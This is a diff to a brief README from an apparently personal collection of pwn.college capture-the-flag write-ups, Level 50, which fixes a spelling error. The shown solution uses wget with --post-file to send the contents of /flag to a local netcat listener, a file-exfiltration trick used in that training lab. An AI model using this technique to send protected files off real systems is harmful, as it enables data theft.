Abdouomar22/pwn-college-writups-fundamentals/README.md

 Level 50

 wget --header="Content-type: multipart/form-data boundary=FILEUPLOAD" --post-file /flag http://127.0.0.1:4554/
-and set up a listeniner with nat cat
+and set up a listener with nat cat
 nc -vlnp 4554
 and get the flag